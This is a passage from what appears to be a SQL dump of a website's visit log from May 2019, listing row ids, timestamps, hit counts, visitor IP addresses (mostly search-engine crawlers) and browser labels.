ther'),(421528,1558347161,2,2,0,0,'66.249.66.220','chrome'),(421529,1558347473,1,1,0,0,'217.20.165.129','chrome'),(421530,1558347494,1,1,0,0,'109.74.154.72','chrome'),(421531,1558348244,1,1,0,0,'66.249.66.132','chrome'),(421532,1558348311,1,1,0,0,'40.77.167.79','other'),(421533,1558348542,1,1,0,0,'66.249.66.222','chrome'),(421534,1558348658,1,1,0,0,'66.249.66.220','chrome'),(421535,1558348952,1,1,0,0,'40.77.167.65','other'),(421536,1558349137,1,1,0,0,'207.46.13.98','other'),(421537,1558349455,1,1,0,0,'40.77.167.79','other'),(421538,1558349512,3,3,0,0,'35.188.111.67','chrome'),(421539,1558349603,1,1,0,0,'66.249.66.222','chrome'),(421540,1558349646,3,3,0,0,'35.192.66.48','chrome'),(421541,1558349660,2,2,0,0,'146.120.24.130','chrome'),(421542,1558349745,3,3,0,0,'35.232.153.2','chrome'),(421543,1558349805,2,2,0,0,'35.188.30.17','chrome'),(421545,1558349821,1,1,0,0,'66.249.66.130','chrome'),(421546,1558349831,3,3,0,0,'34.66.254.235','chrome'),(421547,1558349851,3,3,0,0,'35.193.28.187','chrome'),(421548,1558350642,1,1,0,0,'40.77.167.58','other'),(421549,1558350717,2,2,0,0,'213.180.203.17','other'),(421550,1558350818,1,1,0,0,'5.255.253.38','other'),(421551,1558350945,2,2,0,0,'66.249.66.218','chrome'),(421552,1558351028,1,1,0,0,'178.154.244.49','other'),(421553,1558351310,1,1,0,0,'66.249.66.130','chrome'),(421554,1558351344,1,1,0,0,'91.196.178.91','chrome'),(421555,1558351430,1,1,0,0,'157.55.39.125','other'),(421556,1558351866,1,1,0,0,'66.249.66.220','chrome'),(421557,1558352292,1,1,0,0,'207.46.13.161','other'),(421558,1558353151,1,1,0,0,'207.46.13.175','other'),(421559,1558353168,1,1,0,0,'66.249.66.130','chrome'),(421560,1558353169,1,1,0,0,'185.120.89.188','chrome'),(421561,1558353186,1,1,0,0,'5.45.207.19','other'),(421562,1558353231,1,1,0,0,'207.46.13.98','other'),(421563,1558353790,1,1,0,0,'91.196.178.89','chrome'),(421564,1558354170,1,1,0,0,'66.249.66.222','chrome'),(421565,1558354206,1,1,0,0,'66.249.66.220','chrome'),(421566,1558354730,2,2,0,0,'178.154.244.11','other'),(421567,1558354754,1,1,0,0,'178.93.251.161','chrome'),(421568,1558354985,1,1,0,0,'95.163.255.158','other'),(421569,1558355030,1,1,0,0,'207.46.13.155','other'),(421570,1558355877,2,2,0,0,'207.46.13.153','other'),(421571,1558355956,1,1,0,0,'91.196.178.91','chrome'),(421572,1558356134,2,2,0,0,'95.163.255.94','other'),(421573,1558356517,1,1,0,0,'95.163.255.99','other'),(421574,1558357230,1,1,0,0,'66.249.66.218','chrome'),(421575,1558357445,1,1,0,0,'207.46.13.207','other'),(421576,1558357475,1,1,0,0,'91.196.178.89','chrome'),(421577,1558357653,1,1,0,0,'8.29.198.25','other'),(421578,1558357654,1,1,0,0,'8.29.198.26','other'),(421579,1558357753,3,3,0,0,'66.249.66.220','chrome'),(421580,1558357841,2,2,0,0,'66.249.66.222','chrome'),(421581,1558357865,1,1,0,0,'157.55.39.83','other'),(421582,1558358457,1,1,0,0,'37.9.113.148','other'),(421583,1558358792,1,1,0,0,'207.46.13.155','other'),(421584,1558358795,2,2,0,0,'141.8.142.144','other'),(421585,1558358997,1,1,0,0,'87.250.224.81','other'),(421586,1558359153,1,1,0,0,'178.154.200.8','other'),(421587,1558359575,1,1,0,0,'66.249.66.132','chrome'),(421588,1558359635,1,1,0,0,'91.196.178.43','chrome'),(421589,1558360140,1,1,0,0,'95.163.255.192','other'),(421590,1558360205,1,1,0,0,'40.77.167.59','other'),(421591,1558360826,1,1,0,0,'207.46.13.137','other'),(421592,1558361135,1,1,0,0,'207.46.13.138','other'),(421593,1558361352,1,1,0,0,'193.106.30.98','chrome'),(421594,1558361414,1,1,0,0,'40.77.167.217','other'),(421595,1558361784,1,1,0,0,'40.77.167.59','other'),(421596,1558361870,2,2,0,0,'51.77.52.160','chrome'),(421597,1558361899,1,1,0,0,'66.249.66.128','chrome'),(421598,1558361945,1,1,0,0,'95.163.255.172','other'),(421599,1558362495,1,1,0,0,'176.113.170.104','chrome'),(421600,1558362905,1,1,0,0,'141.8.142.103','other'),(421601,1558362913,1,1,0,0,'178.154.244.11','other'),(421602,1558363439,1,1,0,0,'207.46.13.138','other'),(421603,1558364311,1,1,0,0,'207.46.13.137','other'),(421604,1558365133,1,1,0,0,'40.77.167.59','other'),(421605,1558365181,1,1,0,0,'66.249.66.220','chrome'),(421606,1558366025,1,1,0,0,'157.55.39.193','other'),(421607,1558366118,1,1,0,0,'66.249.66.220','chrome'),(421608,1558366119,1,1,0,0,'95.163.255.170','other'),(421609,1558366335,1,1,0,0,'66.249.66.132','chrome'),(421610,1558367474,1,1,0,0,'95.108.213.4','other'),(421611,1558367506,3,3,0,0,'178.154.244.11','other'),(421612,1558367646,1,1,0,0,'157.55.39.254','other'),(421613,1558367756,1,1,0,0,'141.8.142.103','other'),(421614,1558367888,1,1,0,0,'5.45.207.79','other'),(421615,1558368037,1,1,0,0,'66.249.66.132','chrome'),(421616,1558368206,1,1,0,0,'95.163.255.97','other'),(421617,1558368517,1,1,0,0,'8.29.198.27','other'),(421618,1558368520,1,1,0,0,'8.29.198.25','other'),(421619,1558369491,1,1,0,0,'66.249.66.132','chrome'),(421620,1558369680,1,1,0,0,'66.249.66.128','chrome'),(421621,1558369724,2,2,0,0,'66.249.66.218','chrome'),(421622,1558369963,1,1,0,0,'66.249.66.130','chrome'),(421623,1558369993,1,1,0,0,'157.55.39.89','other'),(421624,1558370884,2,2,0,0,'207.46.13.107','other'),(421625,1558371563,1,1,0,0,'66.249.66.220','chrome'),(421626,1558372004,1,1,0,0,'157.55.39.80','other'),(421627,1558372249,1,1,0,0,'91.121.171.104','other'),(421628,1558372560,1,1,0,0,'157.55.39.152','other'),(421629,1558373850,1,1,0,0,'157.55.39.153','other'),(421630,1558373983,2,2,0,0,'66.249.66.222','chrome'),(421631,1558374272,1,1,0,0,'91.196.178.78','firefox'),(421632,1558374808,3,3,0,0,'66.249.66.220','chrome'),(421633,1558375612,1,1,0,0,'157.55.39.150','other'),(421634,1558376021,1,1,0,0,'157.55.39.149','other'),(421635,1558376189,1,1,0,0,'66.249.66.222','chrome'),(421636,1558376846,2,2,0,0,'185.151.85.133','chrome'),(421637,1558377427,1,1,0,0,'5.45.207.19','other'),(421638,1558377476,1,1,0,0,'5.45.207.79','other'),(421639,1558377531,1,1,0,0,'213.180.203.40','other'),(421640,1558377703,1,1,0,0,'95.163.255.167','other'),(421641,1558377768,1,1,0,0,'91.196.178.129','chrome'),(421642,1558378195,1,1,0,0,'40.77.167.133','other'),(421643,1558378223,1,1,0,0,'157.55.39.149','other'),(421644,1558378342,1,1,0,0,'178.140.188.79','firefox'),(421645,1558378362,1,1,0,0,'66.249.66.128','chrome'),(421646,1558379383,1,1,0,0,'8.29.198.27','other'),(421647,1558379387,1,1,0,0,'8.29.198.25','other'),(421648,1558381066,2,2,0,0,'95.213.141.126','opera'),(421649,1558381137,1,1,0,0,'95.108.213.4','other'),(421650,1558381381,1,1,0,0,'141.8.142.103','other'),(421651,1558382032,2,2,0,0,'157.55.39.149','other'),(421652,1558382606,1,1,0,0,'40.77.167.133','other'),(421653,1558382649,1,1,0,0,'157.55.39.153','other'),(421654,1558383964,1,1,0,0,'84.94.164.48','chrome'),(421655,1558384116,1,1,0,0,'40.77.167.122','other'),(421656,1558384421,1,1,0,0,'66.249.66.220','chrome'),(421657,1558384661,1,1,0,0,'95.163.255.192','other'),(421658,1558384857,2,2,0,0,'157.55.39.152','other'),(421659,1558385582,1,1,0,0,'46.96.21.45','chrome'),(421660,1558385676,1,1,0,0,'66.249.66.130','chrome'),(421661,1558386281,1,1,0,0,'66.249.66.222','chrome'),(421662,1558386365,1,1,0,0,'91.196.177.176','chrome'),(421663,1558387509,1,1,0,0,'66.249.66.220','chrome'),(421664,1558387664,1,1,0,0,'40.77.167.103','other'),(421665,1558388990,12,12,0,0,'40.77.167.118','other'),(421666,1558389127,17,17,0,0,'157.55.39.86','other'),(421667,1558389144,17,17,0,0,'40.77.167.205','other'),(421668,1558389166,11,11,0,0,'40.77.167.103','other'),(421669,1558389353,1,1,0,0,'66.249.66.128','chrome'),(421670,1558389748,1,1,0,0,'178.154.244.11','other'),(421671,1558390156,1,1,0,0,'40.77.167.205','other'),(421672,1558390233,2,2,0,0,'8.29.198.26','other'),(421673,1558390633,1,1,0,0,'66.249.66.220','chrome'),(421674,1558391163,1,1,0,0,'5.164.146.133','firefox'),(421675,1558391491,1,1,0,0,'157.55.39.86','other'),(421676,1558391535,1,1,0,0,'95.163.255.96','other'),(421677,1558391542,1,1,0,0,'66.249.66.222','chrome'),(421678,1558392582,1,1,0,0,'66.249.66.130','chrome'),(421679,1558392606,1,1,0,0,'40.77.167.103','other'),(421680,1558392691,1,1,0,0,'66.249.66.132','chrome'),(421681,1558392880,1,1,0,0,'66.249.66.220','chrome'),(421682,1558392898,1,1,0,0,'178.154.244.11','other'),(421683,1558392966,1,1,0,0,'5.45.207.79','other'),(421684,1558393275,1,1,0,0,'5.45.207.19','other'),(421685,1558393522,1,1,0,0,'66.249.66.222','chrome'),(421686,1558394468,1,1,0,0,'66.249.66.222','chrome'),(421687,1558395306,1,1,0,0,'66.249.66.132','chrome'),(421688,1558395676,1,1,0,0,'66.249.66.220','chrome'),(421689,1558396500,1,1,0,0,'207.46.13.142','other'),(421690,1558397095,2,2,0,0,'207.46.13.86','other'),(421691,1558397681,1,1,0,0,'95.163.255.97','other'),(421692,1558398127,1,1,0,0,'66.249.66.222','chrome'),(421693,1558398732,1,1,0,0,'157.55.39.222','other'),(421694,1558399121,1,1,0,0,'207.46.13.162','other'),(421695,1558399440,1,1,0,0,'188.234.1.235','chrome'),(421696,1558400034,1,1,0,0,'95.163.255.184','other'),(421697,1558400134,1,1,0,0,'207.46.13.86','other'),(421698,1558400333,1,1,0,0,'141.8.183.23','other'),(421699,1558401077,2,2,0,0,'8.29.198.27','other'),(421700,1558401090,1,1,0,0,'95.163.255.167','other'),(421701,1558401295,1,1,0,0,'180.76.15.26','other'),(421702,1558402559,1,1,0,0,'207.46.13.142','other'),(421703,1558402791,1,1,0,0,'207.46.13.86','other'),(421704,1558402830,2,2,0,0,'141.8.142.103','other'),(421705,1558402864,1,1,0,0,'157.55.39.222','other'),(421706,1558403013,1,1,0,0,'65.132.59.34','other'),(421707,1558403489,2,2,0,0,'5.45.207.19','other'),(421708,1558403528,2,2,0,0,'178.154.244.11','other'),(421709,1558403640,1,1,0,0,'207.46.13.162','other'),(421710,1558404484,2,2,0,0,'66.249.66.222','chrome'),(421711,1558404749,1,1,0,0,'66.249.66.218','chrome'),(421712,1558405578,1,1,0,0,'66.249.66.220','chrome'),(421713,1558406194,1,1,0,0,'157.55.39.222','other'),(421714,1558406343,1,1,0,0,'207.46.13.91','other'),(421715,1558406656,1,1,0,0,'95.163.255.99','other'),(421716,1558406811,1,1,0,0,'207.46.13.142','other'),(421717,1558407240,1,1,0,0,'5.45.207.19','other'),(421718,1558407665,1,1,0,0,'40.77.167.39','other'),(421719,1558407675,1,1,0,0,'157.55.39.222','other'),(421720,1558408176,1,1,0,0,'13.66.139.0','other'),(421721,1558408623,1,1,0,0,'66.249.66.222','chrome'),(421722,1558408885,1,1,0,0,'195.154.191.141','chrome'),(421723,1558409709,1,1,0,0,'157.55.39.222','other'),(421724,1558410464,1,0,1,0,'66.249.66.218',''),(421725,1558410681,1,1,0,0,'5.45.207.19','other'),(421726,1558410740,1,1,0,0,'207.46.13.91','other'),(421727,1558411698,1,1,0,0,'207.46.13.142','other'),(421728,1558411832,1,1,0,0,'5.45.207.79','other'),(421729,1558411926,1,1,0,0,'8.29.198.27','other'),(421730,1558411969,1,1,0,0,'8.29.198.26','other'),(421731,1558413075,1,1,0,0,'207.46.13.142','other'),(421732,1558414022,2,2,0,0,'207.46.13.142','other'),(421733,1558414326,1,1,0,0,'40.77.167.221','other'),(421734,1558414451,1,1,0,0,'180.76.15.12','other'),(421735,1558415833,1,1,0,0,'46.166.137.193','other'),(421736,1558415837,1,1,0,0,'46.166.186.197','other'),(421737,1558416450,1,1,0,0,'180.76.15.150','other'),(421738,1558416582,1,1,0,0,'207.46.13.142','other'),(421739,1558417351,2,2,0,0,'40.77.167.221','other'),(421740,1558418061,2,2,0,0,'34.219.254.234','chrome'),(421741,1558419088,1,1,0,0,'157.55.39.89','other'),(421742,1558420178,1,1,0,0,'46.201.104.250','chrome'),(421743,1558420276,1,1,0,0,'157.55.39.89','other'),(421744,1558420595,1,1,0,0,'40.77.167.102','other'),(421745,1558420787,1,1,0,0,'178.95.83.181','chrome'),(421746,1558422220,3,3,0,0,'178.154.244.11','other'),(421747,1558422776,2,2,0,0,'8.29.198.25','other'),(421748,1558423927,1,1,0,0,'77.111.244.100','chrome'),(421749,1558424085,1,1,0,0,'157.55.39.250','other'),(421750,1558424225,2,2,0,0,'60.191.38.77','firefox'),(421751,1558424619,1,1,0,0,'66.249.66.222','chrome'),(421752,1558425330,1,1,0,0,'157.55.39.89','other'),(421753,1558425504,1,1,0,0,'66.249.66.128','chrome'),(421754,1558425996,1,1,0,0,'70.35.207.236','firefox'),(421755,1558425997,1,1,0,0,'157.55.39.103','other'),(421756,1558426847,1,1,0,0,'66.249.66.220','chrome'),(421757,1558426907,1,1,0,0,'93.78.217.204','chrome'),(421758,1558427666,1,1,0,0,'66.249.66.132','chrome'),(421759,1558427785,1,1,0,0,'91.196.178.34','chrome'),(421760,1558427816,2,2,0,0,'157.55.39.103','other'),(421761,1558427883,1,1,0,0,'195.69.221.21','chrome'),(421762,1558428018,1,1,0,0,'157.55.39.250','other'),(421763,1558428614,1,1,0,0,'66.249.66.128','chrome'),(421764,1558428671,1,1,0,0,'66.249.66.220','chrome'),(421765,1558428883,1,1,0,0,'13.66.139.0','other'),(421766,1558429074,1,1,0,0,'66.102.9.24','chrome'),(421767,1558429454,1,1,0,0,'95.163.255.92','other'),(421768,1558429606,1,1,0,0,'91.196.178.171','chrome'),(421769,1558429780,3,3,0,0,'40.77.167.102','other'),(421770,1558429908,1,1,0,0,'66.249.66.218','chrome'),(421771,1558430544,3,3,0,0,'5.45.207.79','other'),(421772,1558430921,2,2,0,0,'66.249.66.218','chrome'),(421773,1558430937,2,2,0,0,'66.249.66.220','chrome'),(421774,1558430959,1,1,0,0,'87.250.224.81','other'),(421775,1558432158,1,1,0,0,'157.55.39.103','other'),(421776,1558432353,1,1,0,0,'40.77.167.102','other'),(421777,1558432619,1,1,0,0,'66.249.66.220','chrome'),(421778,1558433617,1,1,0,0,'8.29.198.27','other'),(421779,1558433663,1,1,0,0,'8.29.198.25','other'),(421780,1558433738,1,1,0,0,'109.74.154.72','chrome'),(421781,1558434090,1,1,0,0,'5.45.207.19','other'),(421782,1558434516,1,1,0,0,'5.45.207.79','other'),(421783,1558435789,1,1,0,0,'91.196.178.171','chrome'),(421784,1558435977,1,1,0,0,'157.55.39.103','other'),(421785,1558435998,3,3,0,0,'34.66.129.233','chrome'),(421786,1558436168,3,3,0,0,'35.224.48.182','chrome'),(421787,1558436200,3,3,0,0,'35.194.17.124','chrome'),(421788,1558436210,2,2,0,0,'104.197.180.164','chrome'),(421790,1558436242,3,3,0,0,'34.66.105.15','chrome'),(421791,1558436257,3,3,0,0,'35.222.167.48','chrome'),(421792,1558436402,1,1,0,0,'91.196.178.87','firefox'),(421793,1558436990,1,1,0,0,'66.249.64.62','chrome'),(421794,1558438031,1,1,0,0,'66.249.64.30','chrome'),(421795,1558438206,1,1,0,0,'46.166.190.169','other'),(421796,1558438214,1,1,0,0,'46.166.190.160','other'),(421797,1558438324,1,1,0,0,'66.249.64.60','chrome'),(421798,1558438855,2,2,0,0,'207.46.13.79','other'),(421799,1558439809,1,1,0,0,'141.8.142.103','other'),(421800,1558440061,1,1,0,0,'95.108.213.4','other'),(421801,1558440468,1,1,0,0,'157.55.39.221','other'),(421802,1558440880,1,1,0,0,'31.43.13.124','chrome'),(421803,1558441885,1,1,0,0,'66.249.64.60','chrome'),(421804,1558442062,1,1,0,0,'66.249.64.29','chrome'),(421805,1558442071,1,1,0,0,'92.113.40.4','chrome'),(421806,1558442094,1,1,0,0,'66.249.64.30','chrome'),(421807,1558442525,1,1,0,0,'91.196.178.89','chrome'),(421808,1558442934,1,1,0,0,'91.196.178.83','chrome'),(421809,1558443311,3,3,0,0,'207.46.13.79','other'),(421810,1558443396,1,1,0,0,'66.249.64.29','chrome'),(421811,1558444365,2,2,0,0,'91.245.76.253','firefox'),(421812,1558444473,2,2,0,0,'8.29.198.27','other'),(421813,1558444493,1,1,0,0,'91.245.76.253','other'),(421814,1558445336,1,1,0,0,'141.8.142.108','other'),(421815,1558445413,1,1,0,0,'66.249.64.29','chrome'),(421816,1558445639,1,1,0,0,'66.249.64.30','chrome'),(421817,1558445695,1,1,0,0,'66.249.64.60','chrome'),(421818,1558445971,3,3,0,0,'157.55.39.64','other'),(421819,1558446127,1,1,0,0,'95.163.255.99','other'),(421820,1558446130,1,1,0,0,'95.163.255.98','other'),(421821,1558446453,1,1,0,0,'157.55.39.221','other'),(421822,1558447213,1,1,0,0,'91.196.178.89','chrome'),(421823,1558447943,1,1,0,0,'66.249.64.60','chrome'),(421824,1558448492,1,1,0,0,'157.55.39.221','other'),(421825,1558449139,1,1,0,0,'66.249.64.30','chrome'),(421826,1558449427,1,1,0,0,'95.108.213.4','other'),(421827,1558449436,1,1,0,0,'141.8.142.108','other'),(421828,1558449460,1,1,0,0,'157.55.39.221','other'),(421829,1558449885,1,1,0,0,'95.108.181.75','other'),(421830,1558451241,1,1,0,0,'157.55.39.64','other'),(421831,1558451641,1,1,0,0,'157.55.39.221','other'),(421832,1558451841,1,1,0,0,'66.249.64.29','chrome'),(421833,1558452208,2,2,0,0,'40.77.167.210','other'),(421834,1558452924,1,1,0,0,'141.8.142.191','other'),(421835,1558453666,2,2,0,0,'66.249.64.31','chrome'),(421836,1558454009,1,1,0,0,'157.55.39.221','other'),(421837,1558454489,1,1,0,0,'40.77.167.13','other'),(421838,1558454777,1,1,0,0,'66.249.64.29','chrome'),(421839,1558455124,1,1,0,0,'193.106.30.98','chrome'),(421840,1558455330,1,1,0,0,'8.29.198.26','other'),(421841,1558455400,1,1,0,0,'8.29.198.27','other'),(421842,1558455813,1,1,0,0,'40.77.167.13','other'),(421843,1558456253,1,1,0,0,'141.8.142.103','other'),(421844,1558456683,1,1,0,0,'37.9.113.20','other'),(421845,1558457816,1,1,0,0,'40.77.167.210','other'),(421846,1558458091,1,1,0,0,'157.55.39.221','other'),(421847,1558459455,1,1,0,0,'66.249.64.60','chrome'),(421848,1558459915,1,1,0,0,'40.77.167.13','other'),(421849,1558460090,1,1,0,0,'193.194.124.171','firefox'),(421850,1558460104,1,1,0,0,'87.250.224.65','other'),(421851,1558461167,1,1,0,0,'157.55.39.221','other'),(421852,1558462213,1,1,0,0,'198.144.177.205','chrome'),(421853,1558462350,1,1,0,0,'157.55.39.144','other'),(421854,1558463351,1,1,0,0,'66.249.64.58','chrome'),(421855,1558463605,1,1,0,0,'87.250.224.64','other'),(421856,1558463645,1,1,0,0,'157.55.39.144','other'),(421857,1558463756,1,1,0,0,'213.180.203.9','other'),(421858,1558464002,2,2,0,0,'66.249.64.29','chrome'),(421859,1558464499,1,1,0,0,'40.77.167.136','other'),(421860,1558465330,1,1,0,0,'40.77.167.25','other'),(421861,1558465856,1,1,0,0,'157.55.39.144','other'),(421862,1558466190,1,1,0,0,'8.29.198.26','other'),(421863,1558466268,1,1,0,0,'8.29.198.27','other'),(421864,1558466701,1,1,0,0,'194.247.173.203','chrome'),(421865,1558467013,2,2,0,0,'40.77.167.25','other'),(421866,1558467014,1,1,0,0,'141.8.142.65','other'),(421867,1558467227,1,1,0,0,'66.249.64.30','chrome'),(421868,1558467593,1,1,0,0,'157.55.39.144','other'),(421869,1558467656,1,1,0,0,'40.77.167.143','other'),(421870,1558468204,2,2,0,0,'80.70.77.132','chrome'),(421871,1558468210,1,1,0,0,'95.163.255.188','other'),(421872,1558468546,1,1,0,0,'91.196.178.177','chrome'),(421873,1558468962,1,1,0,0,'157.55.39.144','other'),(421874,1558469420,2,2,0,0,'66.249.64.31','chrome'),(421875,1558470583,1,1,0,0,'178.154.171.27','other'),(421876,1558471509,1,1,0,0,'66.249.64.60','chrome'),(421877,1558471901,2,2,0,0,'66.249.64.31','chrome'),(421878,1558472851,1,1,0,0,'157.55.39.177','other'),(421879,1558473207,1,1,0,0,'66.249.64.62','chrome'),(421880,1558473209,1,1,0,0,'207.46.13.186','other'),(421881,1558473724,1,1,0,0,'66.249.64.31','chrome'),(421882,1558474613,1,1,0,0,'207.46.13.182','other'),(421883,1558475448,1,1,0,0,'13.66.139.0','other'),(421884,1558475752,1,1,0,0,'207.46.13.182','other'),(421885,1558477034,1,1,0,0,'8.29.198.26','other'),(421886,1558477131,1,1,0,0,'8.29.198.27','other'),(421887,1558477228,1,1,0,0,'87.250.224.47','other'),(421888,1558477669,1,1,0,0,'40.77.167.7','other'),(421889,1558477756,1,1,0,0,'95.163.255.94','other'),(421890,1558479386,1,1,0,0,'40.77.167.175','other'),(421891,1558479678,1,1,0,0,'95.163.255.176','other'),(421892,1558480672,1,1,0,0,'193.106.30.98','chrome'),(421893,1558480719,2,2,0,0,'207.46.13.79','other'),(421894,1558480776,1,1,0,0,'178.154.244.11','other'),(421895,1558480834,1,1,0,0,'40.77.167.170','other'),(421896,1558481034,1,1,0,0,'207.46.13.67','other'),(421897,1558481175,1,1,0,0,'40.77.167.175','other'),(421898,1558482151,1,1,0,0,'157.55.39.228','other'),(421899,1558482650,1,1,0,0,'95.163.255.97','other'),(421900,1558482868,1,1,0,0,'13.66.139.0','other'),(421901,1558483170,1,1,0,0,'157.55.39.228','other'),(421902,1558483609,1,1,0,0,'66.249.64.31','chrome'),(421903,1558483860,1,1,0,0,'5.45.207.79','other'),(421904,1558484038,1,1,0,0,'95.108.213.4','other'),(421905,1558484097,1,1,0,0,'178.154.244.11','other'),(421906,1558484321,1,1,0,0,'207.46.13.67','other'),(421907,1558484330,1,1,0,0,'157.55.39.228','other'),(421908,1558485441,1,1,0,0,'157.55.39.228','other'),(421909,1558486598,1,1,0,0,'157.55.39.184','other'),(421910,1558487464,1,1,0,0,'157.55.39.228','other'),(421911,1558487642,1,1,0,0,'207.46.13.67','other'),(421912,1558487874,1,1,0,0,'8.29.198.27','other'),(421913,1558487991,1,1,0,0,'8.29.198.26','other'),(421914,1558488398,1,1,0,0,'207.46.13.79','other'),(421915,1558489759,1,1,0,0,'95.163.255.192','other'),(421916,1558489772,1,1,0,0,'95.163.255.184','other'),(421917,1558490139,1,1,0,0,'5.45.207.79','other'),(421918,1558490173,1,1,0,0,'5.45.207.19','other'),(421919,1558491480,1,1,0,0,'207.46.13.79','other'),(421920,1558491997,2,2,0,0,'157.55.39.228','other'),(421921,1558493289,1,1,0,0,'5.45.207.79','other'),(421922,1558493408,1,1,0,0,'5.45.207.19','other'),(421923,1558494576,2,2,0,0,'54.189.149.40','chrome'),(421924,1558495236,1,1,0,0,'66.249.64.58','chrome'),(421925,1558495607,1,1,0,0,'95.163.255.99','other'),(421926,1558496200,1,1,0,0,'207.46.13.165','other'),(421927,1558496645,1,1,0,0,'157.55.39.228','other'),(421928,1558496695,1,1,0,0,'91.196.178.130','firefox'),(421929,1558496727,2,2,0,0,'178.154.244.11','other'),(421930,1558498725,1,1,0,0,'8.29.198.26','other'),(421931,1558498843,1,1,0,0,'8.29.198.27','other'),(421932,1558499100,1,1,0,0,'207.46.13.221','other'),(421933,1558499384,1,1,0,0,'157.55.39.228','other'),(421934,1558499792,2,2,0,0,'95.163.255.95','other'),(421935,1558499996,2,2,0,0,'66.249.64.62','chrome'),(421936,1558500191,1,1,0,0,'62.122.93.60','chrome'),(421937,1558501584,1,1,0,0,'178.154.244.65','other'),(421938,1558501729,1,1,0,0,'95.163.255.150','other'),(421939,1558503636,1,1,0,0,'40.77.167.113','other'),(421940,1558504576,1,1,0,0,'66.249.64.30','chrome'),(421941,1558504608,1,1,0,0,'178.154.171.27','other'),(421942,1558504643,1,1,0,0,'141.8.183.23','other'),(421943,1558504757,1,1,0,0,'95.108.181.83','other'),(421944,1558504812,1,1,0,0,'209.17.97.66','other'),(421945,1558505494,1,1,0,0,'66.249.64.30','chrome'),(421946,1558505585,1,1,0,0,'87.250.224.65','other'),(421947,1558505659,1,1,0,0,'213.180.203.17','other'),(421948,1558505943,1,1,0,0,'87.250.224.64','other'),(421949,1558506224,1,1,0,0,'40.77.167.165','other'),(421950,1558506786,1,1,0,0,'157.55.39.242','other'),(421951,1558507138,1,1,0,0,'207.46.13.184','other'),(421952,1558507838,1,1,0,0,'46.166.190.147','other'),(421953,1558507842,1,1,0,0,'46.166.137.193','other'),(421954,1558507888,3,3,0,0,'66.249.64.31','chrome'),(421955,1558508451,1,1,0,0,'66.249.64.30','chrome'),(421956,1558509009,1,1,0,0,'141.8.142.103','other'),(421957,1558509303,1,1,0,0,'5.45.207.79','other'),(421958,1558509511,1,1,0,0,'66.249.64.29','chrome'),(421959,1558509576,1,1,0,0,'8.29.198.27','other'),(421960,1558509707,1,1,0,0,'8.29.198.25','other'),(421961,1558510155,1,1,0,0,'66.249.64.30','chrome'),(421962,1558510229,1,1,0,0,'157.55.39.176','other'),(421963,1558510878,1,1,0,0,'194.28.179.254','chrome'),(421964,1558511738,1,1,0,0,'66.249.64.60','chrome'),(421965,1558512194,1,1,0,0,'95.163.255.154','other'),(421966,1558512367,1,1,0,0,'91.196.178.89','chrome'),(421967,1558512372,1,1,0,0,'40.77.167.0','other'),(421968,1558512503,1,1,0,0,'87.250.224.64','other'),(421969,1558513397,2,2,0,0,'157.55.39.8','other'),(421970,1558513711,1,1,0,0,'193.105.62.143','chrome'),(421971,1558514162,1,1,0,0,'66.249.64.31','chrome'),(421972,1558516148,1,1,0,0,'87.250.224.118','other'),(421973,1558516358,1,1,0,0,'95.163.255.185','other'),(421974,1558516621,1,1,0,0,'95.163.255.96','other'),(421975,1558517429,1,1,0,0,'141.8.142.103','other'),(421976,1558517498,1,1,0,0,'5.45.207.19','other'),(421977,1558517776,1,1,0,0,'66.249.64.29','chrome'),(421978,1558518315,1,1,0,0,'91.196.178.78','chrome'),(421979,1558518377,1,1,0,0,'66.249.64.30','chrome'),(421980,1558520062,1,1,0,0,'40.77.167.0','other'),(421981,1558520168,1,1,0,0,'109.74.154.72','chrome'),(421982,1558520255,1,1,0,0,'5.165.48.72','chrome'),(421983,1558520331,1,1,0,0,'66.249.64.31','chrome'),(421984,1558520424,2,2,0,0,'8.29.198.26','other'),(421985,1558521081,1,1,0,0,'5.255.253.16','other'),(421986,1558521165,1,1,0,0,'178.154.244.11','other'),(421987,1558521265,1,1,0,0,'5.45.207.19','other'),(421988,1558521346,2,2,0,0,'95.213.141.126','opera'),(421989,1558521428,1,1,0,0,'207.46.13.90','other'),(421990,1558522118,1,1,0,0,'37.53.10.41','chrome'),(421991,1558522459,2,2,0,0,'104.154.142.26','chrome'),(421993,1558522550,3,3,0,0,'35.184.27.180','chrome'),(421994,1558522613,3,3,0,0,'35.239.18.253','chrome'),(421995,1558522677,3,3,0,0,'35.225.167.7','chrome'),(421996,1558522742,3,3,0,0,'35.184.212.212','chrome'),(421997,1558522776,3,3,0,0,'35.238.31.218','chrome'),(421998,1558522991,1,1,0,0,'66.249.64.29','chrome'),(421999,1558523594,1,1,0,0,'40.77.167.0','other'),(422000,1558523715,1,1,0,0,'207.46.13.90','other'),(422001,1558523999,86,86,0,0,'62.210.202.81','msie'),(422002,1558524960,2,2,0,0,'66.249.64.31','chrome'),(422003,1558525828,1,0,1,0,'66.249.64.30',''),(422004,1558526456,1,1,0,0,'66.249.64.58','chrome'),(422005,1558526580,1,1,0,0,'91.196.177.46','firefox'),(422006,1558527955,1,1,0,0,'91.213.33.106','chrome'),(422007,1558528192,1,1,0,0,'66.249.64.30','chrome'),(422008,1558528276,1,1,0,0,'157.55.39.130','other'),(422009,1558529037,1,1,0,0,'178.154.244.11','other'),(422010,1558529133,1,1,0,0,'193.106.30.98','chrome'),(422011,1558529281,1,1,0,0,'178.154.171.27','other'),(422012,1558530265,1,1,0,0,'66.249.64.58','chrome'),(422013,1558530396,1,1,0,0,'157.55.39.88','other'),(422014,1558530914,1,1,0,0,'207.46.13.234','other'),(422015,1558531280,1,1,0,0,'8.29.198.27','other'),(422016,1558531435,1,1,0,0,'8.29.198.26','other'),(422017,1558532587,1,1,0,0,'91.196.178.84','firefox'),(422018,1558533075,1,1,0,0,'157.55.39.129','other'),(422019,1558533216,1,1,0,0,'157.55.39.88','other'),(422020,1558533449,1,1,0,0,'66.249.64.60','chrome'),(422021,1558533568,1,1,0,0,'178.154.244.11','other'),(422022,1558533592,1,1,0,0,'94.100.221.234','chrome'),(422023,1558533861,1,1,0,0,'207.46.13.156','other'),(422024,1558533884,1,1,0,0,'37.9.113.20','other'),(422025,1558534857,1,1,0,0,'157.55.39.80','other'),(422026,1558535692,1,1,0,0,'157.55.39.88','other'),(422027,1558536257,1,1,0,0,'91.196.178.172','chrome'),(422028,1558537259,1,1,0,0,'66.249.64.30','chrome'),(422029,1558537299,3,3,0,0,'157.55.39.88','other'),(422030,1558537504,1,1,0,0,'66.249.64.29','chrome'),(422031,1558537656,1,1,0,0,'180.76.15.159','other'),(422032,1558538304,1,1,0,0,'64.246.165.50','firefox'),(422033,1558538505,1,1,0,0,'91.196.178.172','chrome'),(422034,1558538530,1,1,0,0,'66.249.64.31'